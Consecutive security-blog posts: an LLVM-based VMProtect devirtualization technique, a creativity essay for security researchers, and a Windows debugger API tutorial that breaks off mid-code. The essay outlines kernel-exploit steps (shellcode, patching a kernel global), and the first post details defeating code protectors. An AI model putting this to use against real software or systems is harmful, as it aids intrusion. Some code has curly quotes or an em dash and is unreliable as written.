  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[30] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR,
    vsp, vip, vmregs, slots);
  // Return the sliced program counter
  return vip;
}

The acute observer will notice that the function definition is basically identical to the HelperFunction definition given before, with the fundamental difference that the arguments are passed by value and therefore useful if related to the computation of the sliced expression, but with their liveness scope ending at the end of the function, which guarantees that there won’t be store operations to the host context that could possibly bloat the code.

The steps to use the above helper function are:

  • The HelperSlicePC is cloned into a new throwaway function;
  • The call to the HelperStub function is swapped with a call to the VmBlock or VmStub of which we want to slice the final instruction pointer;
  • The called function is forcefully inlined into the HelperSlicePC function;
  • The optimization pipeline is executed on the cloned HelperSlicePC function resulting in the slicing of the final instruction pointer expression as a side-effect of the optimizations.

The following LLVM-IR snippet shows the idea in action, resulting in the final optimized function where the condition and edges of the conditional branch are clearly visible.

define dso_local i64 @HelperSlicePC(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #5 {
  %1 = call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1) #4, !srcloc !9
  %2 = extractvalue { i32, i32, i32, i32 } %1, 0
  %3 = and i32 %2, 4080
  %4 = icmp eq i32 %3, 4064
  %5 = select i1 %4, i64 5371013457, i64 5371013227
  ret i64 %5
}

In the following section we’ll see how variations of this technique are used to explore the virtualized control flow graph, solve the conditional branches, and recover the switch cases.

Exploration

The exploration of a virtualized control flow graph can be done in different ways and usually protectors like VMProtect or Themida show a distinctive shape that can be pattern-matched with ease, simplified and parsed to obtain the outgoing edges of a conditional block.

The logic used by different VMProtect conditional jump versions has been detailed in the past, so in this section we are going to delve into an SMT-driven algorithm based on the incremental construction of the explored control flow graph and specifically built on top of the slicing logic explained in the previous section.

Given the generic nature of the detailed algorithm, nothing stops it from being used on other protectors. The usual catch is obviously caused by protections embedding hard to solve constraints that may hinder the automated solving phase, but the construction and propagation of the partial CFG constraints and expressions could still be useful in practice to pull out less automated exploration algorithms, or to identify and simplify anti-dynamic symbolic execution tricks (e.g. dummy loops leading to path explosion that could be simplified by LLVM’s loop optimization passes or custom user passes).

Partial CFG

A partial control flow graph is a control flow graph built connecting the currently explored basic blocks given the known edges between them. The idea behind building it, is that each time that we explore a new basic block, we gather new outgoing edges that could lead to new unexplored basic blocks, or even to known basic blocks. Every new edge between two blocks is therefore adding information to the entire control flow graph and we could actually propagate new useful constraints and values to enable stronger optimizations, possibly easing the solving of the conditional branches or even changing a known branch from unconditional to conditional.

Let’s look at two motivating examples of why building a partial CFG may be a good idea to be able to replicate the kind of reasoning usually implemented by symbolic execution tools, with the addition of useful built-in LLVM passes.

Motivating example #1

Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlock and purple the VmBlock of interest for the example.

Motivating example 1

Let’s assume we just solved the outgoing edges for the basic block A, obtaining two connections leading to the new basic blocks B and C. Now assume that we sliced the branch condition of the sole basic block B, obtaining an access into a constant array with a 64 bits symbolic index. Enumerating all the valid indices may be a non-trivial task, so we may want to restrict the search using known constraints on the symbolic index that, if present, are most likely going to come from the chain(s) of predecessor(s) of the basic block B.

To draw a symbolic execution parallel, this is the case where we want to collect the path constraints from a certain number of predecessors (e.g. we may want to incrementally harvest the constraints, because sometimes the needed constraint is locally near to the basic block we are solving) and chain them to be fed to an SMT solver to execute a successful enumeration of the valid indices.

Tools like Souper automatically harvest the set of path constraints while slicing an expression, so building the partial control flow graph and feeding it to Souper may be sufficient for the task. Additionally, with the LLVM API to walk the predecessors of a basic block it’s also quite easy to obtain the set of needed constraints and, when available, we may also take advantage of known-to-be-true conditions provided by the llvm.assume intrinsic.

Motivating example #2

Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlocks, purple the VmBlock of interest for the example, dashed red arrows the edges of interest for the example and the solid green arrow an edge that has just been processed.

Motivating example 2

Let’s assume we just solved the outgoing edges for the basic block E, obtaining two connections leading to a new block G and a known block B. In this case we know that we detected a jump to the previously visited block B (edge in green), which is basically forming a loop chain (BCEB) and we know that starting from B we can reach two edges (BC and DF, marked in dashed red) that are currently known as unconditional, but that, given the newly obtained edge EB, may not be anymore and therefore will need to be proved again. Building a new partial control flow graph including all the newly discovered basic block connections and slicing the branch of the blocks B and D may now show them as conditional.

As a real world case, when dealing with concolic execution approaches, the one mentioned above is the usual pattern that arises with index-based loops, starting with a known concrete index and running till the index reaches an upper or lower bound N. During the first N-1 executions the tool would take the same path and only at the iteration N the other path would be explored. That’s the reason why concolic and symbolic execution tools attempt to build heuristics or use techniques like state-merging to avoid running into path explosion issues (or at best executing the loop N times).

Building the partial CFG with LLVM instead, would mark the loop back edge as unconditional the first time, but building it again, including the knowledge of the newly discovered back edge, would immediately reveal the loop pattern. The outcome is that LLVM would now be able to apply its loop analysis passes, the user would be able to use the API to build ad-hoc LoopPass passes to handle special obfuscation applied to the loop components (e.g. encoded loop variant/invariant) or the SMT solvers would be able to treat newly created Phi nodes at the merge points as symbolic variables.

The following LLVM-IR snippet shows the sliced partial control flow graphs obtained during the exploration of the virtualized assembly snippet presented below.

start:
  mov rax, 2000
  mov rbx, 0
loop:
  inc rbx
  cmp rbx, rax
  jne loop

The original assembly snippet.

define dso_local i64 @FirstSlice(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = call i64 @HelperKeepPC(i64 5369464257)
  ret i64 %1
}

The first partial CFG obtained during the exploration phase

define dso_local i64 @SecondSlice(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  br label %1

1:                                                ; preds = %1, %0
  %2 = phi i64 [ 0, %0 ], [ %3, %1 ]
  %3 = add i64 %2, 1
  %4 = icmp eq i64 %2, 1999
  %5 = select i1 %4, i64 5369183207, i64 5369464257
  %6 = call i64 @HelperKeepPC(i64 %5)
  %7 = icmp eq i64 %6, 5369464257
  br i1 %7, label %1, label %8

8:                                                ; preds = %1
  ret i64 233496237
}

The second partial CFG obtained during the exploration phase. The block 8 is returning the dummy 0xdeaddead (233496237) value, meaning that the VmBlock instructions haven’t been lifted yet.

define dso_local i64 @F_0x14000101f_NoLoopOpt(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  br label %1

1:                                                ; preds = %1, %0
  %2 = phi i64 [ 0, %0 ], [ %3, %1 ]
  %3 = add i64 %2, 1
  %4 = icmp eq i64 %2, 1999
  br i1 %4, label %5, label %1

5:                                                ; preds = %1
  store i64 %3, i64* %rbx, align 8
  store i64 2000, i64* %rax, align 8
  ret i64 5368713281
}

The final CFG obtained at the completion of the exploration phase.

define dso_local i64 @F_0x14000101f_WithLoopOpt(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  store i64 2000, i64* %rbx, align 8
  store i64 2000, i64* %rax, align 8
  ret i64 5368713281
}

The loop-optimized final CFG obtained at the completion of the exploration phase.

The FirstSlice function shows that a single unconditional branch has been detected, identifying the bytecode address 0x1400B85C1 (5369464257), this is because there’s no knowledge of the back edge and the comparison would be cmp 1, 2000. The SecondSlice function instead shows that a conditional branch has been detected selecting between the bytecode addresses 0x140073BE7 (5369183207) and 0x1400B85C1 (5369464257). The comparison is now done with a symbolic PHINode. The F_0x14000101f_WithLoopOpt and F_0x14000101f_NoLoopOpt functions show the fully devirtualized code with and without loop optimizations applied.

Pseudocode

Given the knowledge obtained from the motivating examples, the pseudocode for the automated partial CFG driven exploration is the following:

  1. We initialize the algorithm creating:

    • A stack of addresses of VmBlocks to explore, referred to as Worklist;
    • A set of addresses of explored VmBlocks, referred to as Explored;
    • A set of addresses of VmBlocks to reprove, referred to as Reprove;
    • A map of known edges between the VmBlocks, referred to as Edges.
  2. We push the address of the entry VmBlock into the Worklist;
  3. We fetch the address of a VmBlock to explore, we lift it to LLVM-IR if met for the first time, we build the partial CFG using the knowledge from the Edges map and we slice the branch condition of the current VmBlock. Finally we feed the branch condition to Souper, which will process the expression harvesting the needed constraints and converting it to an SMT query. We can then send the query to an SMT solver, asking for the valid solutions, incrementally rejecting the known solutions up to some limit (worst case) or till all the solutions have been found.
  4. Once we obtained the outgoing edges for the current VmBlock, we can proceed with updating the maps and sets:

    • We verify if each solved edge is leading to a known VmBlock; if it is, we verify if this connection was previously known. If unknown, it means we found a new predecessor for a known VmBlock and we proceed with adding the addresses of all the VmBlocks reachable by the known VmBlock to the Reprove set and removing them from the Explored set; to speed things up, we can eventually skip each VmBlock known to be firmly unconditional;
    • We update the Edges map with the newly solved edges.
  5. At this point we check if the Worklist is empty. If it isn’t, we jump back to step 3. If it is, we populate it with all the addresses in the Reprove set, clearing it in the process and jumping back to step 3. If also the Reprove set is empty, it means we explored the whole CFG and eventually reproved all the VmBlocks that obtained new predecessors during the exploration phase.

As mentioned at the start of the section, there are many ways to explore a virtualized CFG and using an SMT-driven solution may generalize most of the steps. Obviously, it brings its own set of issues (e.g. hard to solve constraints), so one could eventually fall back to the pattern matching based solution at need. As expected, the pattern matching based solution would also blindly explore unreachable paths at times, so a mixed solution could really offer the best CFG coverage.

The pseudocode presented in this section is a simplified version of the partial CFG based exploration algorithm used by SATURN at this point in time, streamlined from a set of reasonings that are unnecessary while exploring a CFG virtualized by VMProtect.

Pipeline

So far we hinted at the underlying usage of LLVM’s optimization and analysis passes multiple times through the sections, so we can finally take a look at: how they fit in, their configuration and their limitations.

Managing the pipeline

Running the whole -O3 pipeline may not always be the best idea, because we may want to use only a subset of passes, instead of wasting cycles on passes that we know a priori don’t have any effect on the lifted LLVM-IR code. Additionally, by default, LLVM is providing a chain of optimizations which is executed once, is meant to optimize non-obfuscated code and should be as efficient as possible.

Although, in our case, we have different needs and want to be able to:

  • Add some custom passes to tackle context-specific problems and do so at precise points in the pipeline to obtain the best possible output, while avoiding phase ordering issues;
  • Iterate the optimization pipeline more than once, ideally until our custom passes can’t apply any more changes to the IR code;
  • Be able to pass custom flags to the pipeline to toggle some passes at will and eventually feed them with information obtained from the binary (e.g. access to the binary sections).

LLVM provides a FunctionPassManager class to craft our own pipeline, using LLVM’s passes and custom passes. The following C++ snippet shows how we can add a mix of passes that will be executed in order until there won’t be any more changes or until a threshold will be reached:

void optimizeFunction(llvm::Function *F, OptimizationGuide &G) {
  // Fetch the Module
  auto *M = F->getParent();
  // Create the function pass manager
  llvm::legacy::FunctionPassManager FPM(M);
  // Initialize the pipeline
  llvm::PassManagerBuilder PMB;
  PMB.OptLevel = 3;
  PMB.SizeLevel = 2;
  PMB.RerollLoops = false;
  PMB.SLPVectorize = false;
  PMB.LoopVectorize = false;
  PMB.Inliner = createFunctionInliningPass();
  // Add the alias analysis passes
  FPM.add(createCFLSteensAAWrapperPass());
  FPM.add(createCFLAndersAAWrapperPass());
  FPM.add(createTypeBasedAAWrapperPass());
  FPM.add(createScopedNoAliasAAWrapperPass());
  // Add some useful LLVM passes
  FPM.add(createCFGSimplificationPass());
  FPM.add(createSROAPass());
  FPM.add(createEarlyCSEPass());
  // Add a custom pass here
  if (G.RunCustomPass1)
    FPM.add(createCustomPass1(G));
  FPM.add(createInstructionCombiningPass());
  FPM.add(createCFGSimplificationPass());
  // Add a custom pass here
  if (G.RunCustomPass2)
    FPM.add(createCustomPass2(G));
  FPM.add(createGVNHoistPass());
  FPM.add(createGVNSinkPass());
  FPM.add(createDeadStoreEliminationPass());
  FPM.add(createInstructionCombiningPass());
  FPM.add(createCFGSimplificationPass());
  // Execute the pipeline
  size_t minInsCount = F->getInstructionCount();
  size_t pipExeCount = 0;
  FPM.doInitialization();
  do {
    // Reset the IR changed flag
    G.HasChanged = false;
    // Run the optimizations
    FPM.run(*F);
    // Check if the function changed
    size_t curInsCount = F->getInstructionCount();
    if (curInsCount < minInsCount) {
      minInsCount = curInsCount;
      G.HasChanged |= true;
    }
    // Increment the execution count
    pipExeCount++;
  } while (G.HasChanged && pipExeCount < 5);
  FPM.doFinalization();
}

The OptimizationGuide structure can be used to pass information to the custom passes and control the execution of the pipeline.

Configuration

As previously stated, the LLVM default pipeline is meant to be as efficient as possible, therefore it’s configured with a tradeoff between efficiency and efficacy in mind. While devirtualizing big functions it’s not uncommon to see the effects of the stricter configurations employed by default. But an example is worth a thousand words.

In the Godbolt UI we can see on the left a snippet of LLVM-IR code that is storing i32 values at increasing indices of a global array named arr. The store at line 96, writing the value 91 at arr[1], is a bit special because it is fully overwriting the store at line 6, writing the value 1 at arr[1]. If we look at the upper right result, we see that the DSE pass was applied, but somehow it didn’t do its job of removing the dead store at line 6. If we look at the bottom right result instead, we see that the DSE pass managed to achieve its goal and successfully killed the dead store at line 6. The reason for the difference is entirely associated to a conservative configuration of the DSE pass, which by default (at the time of writing), is walking up to 90 MemorySSA definitions before deciding that a store is not killing another post-dominated store. Setting the MemorySSAUpwardsStepLimit to a higher value (e.g. 100 in the example) is definitely something that we want to do while deobfuscating some code.

Each pass that we are going to add to the custom pipeline is going to have configurations that may be giving suboptimal deobfuscation results, so it’s a good idea to check their C++ implementation and figure out if tweaking some of the options may improve the output.

Limitations

When tweaking some configurations is not giving the expected results, we may have to dig deeper into the implementation of a pass to understand if something is hindering its job, or roll up our sleeves and develop a custom LLVM pass. Some examples on why digging into a pass implementation may lead to fruitful improvements follow.

IsGuaranteedLoopInvariant (DSE, MSSA)

While looking at some devirtualized code, I noticed some clearly-dead stores that weren’t removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diffs: D96979, D97155. The bottom line is that the IsGuarenteedLoopInvariant function used by the DSE and MSSA passes was not using the safe assumption that a pointer computed in the entry block is, by design, guaranteed to be loop invariant as the entry block of a Function is guaranteed to have no predecessors and not to be part of a loop.

GetPointerBaseWithConstantOffset (DSE)

While looking at some devirtualized code that was accessing memory slots of different sizes, I noticed some clearly-dead stores that weren’t removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diff: D97676. The bottom line is that while computing the partially overlapping memory stores, the DSE was considering only memory slots with the same base address, ignoring fully overlapping stores offsetted between each other. The solution is making use of another patch which is providing information about the offsets of the memory slots: D93529.

Shift-Select folding (InstCombine)

And obviously there is no two without three! Nah, just kidding, a patch I wanted to get accepted to simplify one of the recurring patterns in the computation of the VMProtect conditional branches has been on pause because InstCombine is an extremely complex piece of code and additions to it, especially if related to uncommon patterns, are unwelcome and seen as possibly bloating and slowing down the entire pipeline. Additional information on the pattern and the reasons that hinder its folding are available in the following differential: D84664. Nothing stops us from maintaining our own version of InstCombine as a custom pass, with ad-hoc patterns specifically selected for the obfuscation under analysis.

What’s next?

In Part 3 we’ll have a look at a list of custom passes necessary to reach a superior output quality. Then, some words will be spent on the handling of the unsupported instructions and on the recompilation process. Last but not least, the output of 6 devirtualized functions, with varying code constructs, will be shown.

Security Research and the Creative Process

I get asked pretty often about my research process, how I find research ideas and how I approach a new idea or project. I don’t find those questions especially useful — the answers are usually very specific and not necessarily helpful to anyone not focusing on my specific corner of infosec or working exactly the way I like to work. So instead of answering these questions here, I will talk about something that I think the security industry doesn’t focus on enough — creativity. Because creativity is at the base of all that we do: finding a new research project, bypassing a security mitigation, hunting for a source of a bug, and pretty much everything else. This is the point where a lot of you jump in to say “but I’m just not creative!” and I politely disagree and tell you that regardless of your basic level of creativity, there are a few tricks that can improve it, or at least make your work more interesting and fun.

These are tricks that I mostly learned while practicing circus and then translated them to my tech work and research. You can pretty much apply them to anything you do, technical or not.

Can Limitations Be a Good Thing?

This could sound counter-intuitive but adding artificial roadblocks can encourage your brain to look at a problem from a different perspective and build different paths around it. Think of tying your right arm behind your back — yes it will be extremely inconvenient, but it will also force you to learn how to get more functionality from your left, or learn how to do things single-handedly when you used to use two hands for them. Maybe you’ll even learn to use your legs or other body parts for help.

In a similar way, adding limitations to your research can force you to try new things, learn new techniques or maybe even develop a whole new thing to overcome the “roadblock”. A few practical examples of that would be:

1. Creating a kernel exploit which patches the token’s privileges, but can only patch the “Present” bits and not the “Enabled” bits, demonstrated here: Exploiting a “Simple” Vulnerability, Part 2 — What If We Made Exploitation Harder? — Winsider Seminars & Solutions Inc. (windows-internals.com)

2. Writing a code injector, but injecting code into a process where Dynamic Code Guard is enabled — meaning no dynamic code is allowed so you can’t allocate and write a shellcode into arbitrary memory.

3. Write a test malware, but you’re not allowed to use your usual persistence methods.

4. Create a tool to monitor the system for malicious activity — which is not allowed to load a kernel driver and can only run in User-Mode.

An easy way to enforce real-world limitations on an offensive project would be to enable security mitigations — you could take an exploit that was written for an old operating system, or one that enables almost no security mitigations, and slowly enable newer mitigations and find ways to bypass them. First enable ASLR, then CFG, Dynamic Code Guard… you can work your way up to a fully patched Windows 10 machine enabling VBS, HVCI, etc.

Solve the Maze Backwards

Do you know the feeling of having a new project, knowing what you need to do and then spending the next five hours staring at an empty IDE and feeling overwhelmed? Yeah, me too. Starting a project is always the hardest part. But you don’t actually need to start it at the beginning. Remember being a kid, solving the maze on the back of the cereal box and always starting from the end because for some reason it made it so much easier? (Please tell me I’m not the only one who did that). Good news — you can do the same thing with your research project!

Let’s imagine you’re trying to write a kernel exploit that needs to do the following things:

1. Find the base address of ntoskrnl.exe.

2. Search for the offset of a specific global variable that you want to overwrite.

3. Write a shellcode into memory.

4. Patch the global variable from step 2 to point to your shellcode.

Now let’s say you have no idea how to do step #1, doing binary searches is gross and not fun so you’re not excited about step #2 and you hate writing shellcodes so you’re really not looking forward to step #3. However, step #4 seems great and you know exactly how to do it. Sadly it’s all the way on the other side of steps 1–3 and you don’t know how you’ll ever manage to find the motivation to get all the way there.

You don’t have to — you can “cheat” and use a debugger to find the address of the global variable in memory and hard-code it. Then you can use the debugger again to write a simple “int 3” instruction somewhere in memory and hard-code that address as well. Then you implement step #4 as if steps 1–3 are already done. This method is way more fun and should give your brain the dopamine boost it needs to at least try to implement one of the other steps. Besides, adding features to existing code is about 1000x easier than writing code where nothing exists.

You don’t have to start from the end either — you can pick any step that seems the easiest or the most fun and start from there and slowly build the steps around it later.

Give Yourself a Break

This advice is given so often it’s basically a cliché but it’s true so I feel like I have to say it: If you’ve been staring at your project for an hour and made no progress — stop. Go for a walk, take a shower, take a nap, go have that lunch you probably skipped because you were too focused on work, or if you feel too guilty to step away from the computer — at least work on a different task. Preferably something quick and easy to make your brain feel that you achieved something and allow you to take an actual break. Allowing your brain to rest and focus on some other things will make it happy and the solution to issue you’ve been stuck on will probably come to you while you’re not working anyway.

These tips might not work for everyone but those usually work for me when I’m stuck or out of ideas so I hope at least some of that will work for you too!

Windows Debugger API — The End of Versioned Structures

Windows Debugger API — The End of Versioned Structures

Some time ago I was introduced to the Windows debugger API and found it incredibly useful for projects that focus on forensics or analysis of data on a machine. This API allows us to open a dump file taken on any windows machine and read information from it using the symbols that match the specific modules contained in the dump.

This API can be used in live debugging as well, either user-mode debugging of a process or kernel debugging. This post will show how to use it to analyze a memory dump, but this can be converted to live debugging relatively easily.

The main benefit of the debugger API is that it uses the specific symbols for the Windows version that it is running against, letting us write code that will work with any Windows version without having to keep an ever-growing header of structures for different versions, and needing to choose the right one and update our code every time the structure changes. For example, a common data structure to look at on Windows is the process, represented in the kernel by the EPROCESS structure. This structure changes almost every Windows build, meaning that fields inside it keep moving around. A field we are interested in might be at offset 0x100 in one Windows version, 0x120 in another, 0x108 in another, and so on. If we use the wrong offset the driver will not work properly and is very likely to accidentally crash the system. By using the symbols, we also receive the correct size and type of each structure and its sub-structures, so a nested structure getting larger, or a field changing its type, for example being a push lock in one version and a spin lock another, will be handled correctly by the debugger API without and code changes on our side.

The debugger API avoids this problem entirely by using symbols, so we can write our code once and it will run successfully on dumps taken from every possible Windows version without any need for updates when new builds are released. Also, it runs in user-mode so it doesn’t have all the inherent risks that kernel mode code carries with it, and since it can operate on a dump file, it doesn’t have to run on the machine that it analyzes. Which can be a huge benefit, as sometimes we can’t run our debugging tools on the machine we are interested in. This also lets us do extremely complicated things on much faster machines, such as analyzing a dump — or many dumps — in the cloud.

The main disadvantage of it is that the interface is not as easy as just using the types directly, and it takes some effort to get used to it. It also means slightly uglier, less readable code, unless you create macros around some of the calls.

In this post we’ll learn how to write a simple program that opens a memory dump iterates over all the processes and prints the name and PID of each one. For anyone not familiar with process representation in the Windows kernel, all the processes are linked together by a linked list (that is a LIST_ENTRY structure that points to the next entry and the previous entry). This list is pointed to by the nt!PsActiveProcessHead symbol and the list is found at the ActiveProcessLinks field of the EPROCESS structure. Of course, the symbol is not exported and the EPROCESS structure is not available in any of the public headers so implementing this in a driver will require some hard coded offsets and version checks to get the right offsets for each. Or we can use the debugger API instead!

To access all of this functionality we’ll need to include DbgEng.h and link against DbgEng.lib. And this is the right time for an important tip shared by Alex Ionescu — the debugging-related DLLs supplied by Windows are unstable and will often simply not work at all and leave you confused and wondering what you did wrong and why your code that was perfectly good yesterday is suddenly failing. WinDbg comes with its own versions of all the DLLs required for this functionality, that are way better. So you’ll want to copy Dbgeng.dll, Dbghelp.dll and Symsrv.dll from the directory where windbg.exe is into your output directory of this project. Do whatever you need to remember to always use the DLLs that come with WinDbg, this will save you a lot of time and frustration later.

Now that we have that covered we can start writing the code. Before we can access the dump file, we need to initialize 4 basic variables:

IDebugClient* debugClient;
IDebugSymbols* debugSymbols;
IDebugDataSpaces* dataSpaces;
IDebugControl* debugControl;

These will let us open the dump, access its memory and the symbols for all the modules in it and use them to parse the contents of the dump. First, we call DebugCreate to initialize the debugClient variable:

DebugCreate(__uuidof(IDebugClient), (PVOID*)&debugClient);

Note that all the functions we’ll use here return an HRESULT that should be validated using SUCCEEDED(result). In this post I will skip those validations to keep the code smaller and easier to read, but in any real program these should not be skipped.

After we initialized debugClient we can use it to initialize the other 3:

debugClient->QueryInterface(__uuidof(IDebugSymbols), 
(PVOID*)&debugSymbols);
debugClient->QueryInterface(__uuidof(IDebugDataSpaces),
(PVOID*)&dataSpaces);
debugClient->QueryInterface(__uuidof(IDebugControl),
(PVOID*)&debugControl);

There, setup done. We can open our dump file with debugClient->OpenDumpFile and then wait until all symbol files are loaded:

debugClient->OpenDumpFile(DumpFilePath);
debugControl->WaitForEvent(DEBUG_WAIT_DEFAULT, 0);

Once the dump is loaded we can start reading it. The module we are most interested in here is nt — we are going to use the PsActiveProcessHead symbol as well as the EPROCESS structure that belong to it. So we need to get the base of the module using dataSpaces->ReadDebuggerData. This function receives 4 arguments — Index, Buffer, BufferSize and DataSize. The last one is an optional output parameter, telling us how many bytes were written, or if the buffer wasn’t large enough, how many bytes are needed. To keep things simple we will always pass nullptr as DataSize, since we know in advance the needed sizes for all of our data. The second and third arguments are pretty clear so no need to say much about them. And for the first argument we need to look at the list of options found at DbgEng.h:

// Indices for ReadDebuggerData interface
#define DEBUG_DATA_KernBase 24
#define DEBUG_DATA_BreakpointWithStatusAddr 32
#define DEBUG_DATA_SavedContextAddr 40
#define DEBUG_DATA_KiCallUserModeAddr 56
#define DEBUG_DATA_KeUserCallbackDispatcherAddr 64
#define DEBUG_DATA_PsLoadedModuleListAddr 72
#define DEBUG_DATA_PsActiveProcessHeadAddr 80
#define DEBUG_DATA_PspCidTableAddr 88
#define DEBUG_DATA_ExpSystemResourcesListAddr 96
#define DEBUG_DATA_ExpPagedPoolDescriptorAddr 104
#define DEBUG_DATA_ExpNumberOfPagedPoolsAddr 112
...

These are all commonly used symbols, so they get their own index to make querying their value faster and easier. Later in this post we’ll see how we can get the value of a symbol that is less common and isn’t on this list.

The first index on this list is, conveniently, DEBUG_DATA_KernBase. So we create a variable to get the base address of the nt module and call ReadDebuggerData:

ULONG64 kernBase;
dataSpaces->ReadDebuggerData(DEBUG_DATA_KernBase,
&kernBase,
sizeof(kernBase),
nullptr);

Next, we want to iterate over all the processes and print information about them. To do that we need the EPROCESS type. One annoying thing about the debugger API is that it doesn’t allow us to use types like we would if they were in a header file. We can’t declare a variable of type EPROCESS and access its fields. Instead we need to access memory through a type ID and the offsets inside the type. Foe example, if we want to access the ImageFileName field inside a process we will need to read the information that’s found in processAddr + imageFileNameOffset. But this is getting a bit ahead. First we need to get the type ID of _EPROCESS using debugSymbols->GetTypeId, which receives the module base, type name and an output argument for the type ID. As the name suggests, this function doesn’t give us the type itself, only an identifier that we’ll use to get offsets inside the structure:

ULONG EPROCESS;
debugSymbols->GetTypeId(kernBase, “_EPROCESS”, &EPROCESS);

Now let’s get the offsets of the fields inside the EPROCESS so we can easily access them. Since we want to print the name and PID of each process we’ll need the ImageFileName and UniqueProcessId fields, in addition to ActiveProcessLinks so we iterate over the processes. To get those we’ll call debugSymbols->GetFieldOffset, which receives the module base, type ID, field name and an output argument that will receive the field offset:

ULONG imageFileNameOffset;
ULONG uniquePidOffset;
ULONG activeProcessLinksOffset;
debugSymbols->GetFieldOffset(kernBase,
EPROCESS,
“ImageFileName”,
&imageFileNameOffset);
debugSymbols->GetFieldOffset(kernBase,
EPROCESS,
“UniqueProcessId”,
&uniquePidOffset);
debugSymbols->GetFieldOffset(kernBase,
EPROCESS,
“ActiveProcessLinks”,
&activeProcessLinksOffset);

To start iterating the process list we need to read PsActiveProcessHead. You might have noticed earlier that this symbol has an index in DbgEng.h so it can be read directly using ReadDebuggerData. But for this example we won’t read it that way, and instead show how to read it like a symbol that doesn’t have an index. So first we need to get the symbol offset in the dump file, using debugSymbols->GetOffsetByName:

ULONG64 activeProcessHead;
debugSymbols->GetOffsetByName(“nt!PsActiveProcessHead”,
&activeProcessHead);

This doesn’t give us the actual value yet, only the offset of this symbol. To get the value we’ll need to read the memory that this address points to from the dump using dataSpaces->ReadVirtual, which receives an address to read from, Buffer, BufferSize and an optional output argument BytesRead. We know that this symbol points to a LIST_ENTRY structure so we can just define a local linked list and read the variable into it. In this case we got lucky — the LIST_ENTRY structure is documented. If this symbol contained a non-documented structure this process would require a couple more steps and be a bit more painful.

LIST_ENTRY activeProcessLinks;
dataSpaces->ReadVirtual(activeProcessHead,
&activeProcessLinks,
sizeof(activeProcessLinks),
nullptr);

Now we have almost everything we need to start iterating the process list! We’ll define a local process variable and use it to store the address of the current process we’re looking at. In each iteration, activeProcessLinks.Flink will point to the first process in the system, but it won’t point to the beginning of the EPROCESS. It points to the ActiveProcessLinks field, so to get to the beginning of the structure we’ll need to subtract the offset of ActiveProcessLinks field from the address (basically what the CONTAINING_RECORD macro would do if we could use it here). Notice that we are using a ULONG64 here on purpose, instead of a ULONG_PTR to save us the pain of using pointer arithmetic and avoiding casts in future function calls, since most debugger API functions receive arguments as ULONG64:

ULONG64 process;
process = (ULONG64)activeProcessLinks.Flink — activeProcessLinksOffset;

